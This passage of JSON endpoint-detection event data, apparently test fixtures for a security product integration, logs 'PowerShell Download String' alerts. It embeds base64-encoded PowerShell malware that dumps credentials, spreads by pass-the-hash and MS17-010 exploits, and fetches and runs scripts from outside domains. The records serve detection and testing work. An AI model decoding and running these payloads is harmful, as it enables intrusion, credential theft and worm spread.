HQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==","parent_app":"WmiPrvSE.exe","parent_app_path":"C:\\Windows\\System32\\wbem","parent_pid":2236,"parent_puid":132461352663910600,"parent_user":"SYSTEM","parent_user_sid":"010100000000000512000000","pid":10724,"puid":132465072105597400,"ts":1602033881727175700,"user":"user@testdomain.com","user_sid":"010100000000000512000000"}}],"limited":false,"matched":1},"schema":"endpoint","schema_epoch":2,"sig_id":20200719101800,"sig_rev":1},"detection":"apde:20200719101800","end_ts":1610640884,"engine":"apde","id":"cF3A8bacac","name":"PowerShell Download String","observables":{"file":[{"md5":"d683c112190f4b4c6d477d693ee88e35","name":"WmiPrvSE.exe","path":"C:\\Windows\\System32\\wbem","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"67858ead93feed62c0b1865369840e6e8086f53b","sha256":"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334","size":425984,"type_id":1},{"md5":"a575a7610e5f003cc36df39e07c4ba7d","name":"powershell.exe","path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"88e7cdc0b75364418e11b2c53f772085f1b61d1e","sha256":"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218","size":443392,"type_id":1}]},"remediated":false,"severity":"medium","silent":true,"start_ts":1610640884,"tactics":["TA0002","TA0005"],"techniques":["T1059"],"type":"activity","normalized":{"observables":{"file":{"name":["wmiprvse.exe","powershell.exe"],"path":["c:\\windows\\system32\\wbem","c:\\windows\\system32\\windowspowershell\\v1.0"]}},"name":"powershell download string"},"ts":1610640884},"tactics":["TA0002","TA0005"],"techniques":["T1059"]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880683125978957000,"timestamp":1610640884,"timestamp_nanoseconds":791000000,"date":"2021-01-14T16:14:44+00:00","event_type":"Threat Detection","event_type_id":553648222,"detection":"PowerShell Download String","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"bp_data":{"audit":false,"details":{"actions":[],"eng_epoch":1,"eng_ver":"0.9.0.104","matched_activity":{"events":[{"process:start":{"app":"powershell.exe","app_path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","args":["powershell.exe","-NoP","-NonI","-W","Hidden","-E","JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQ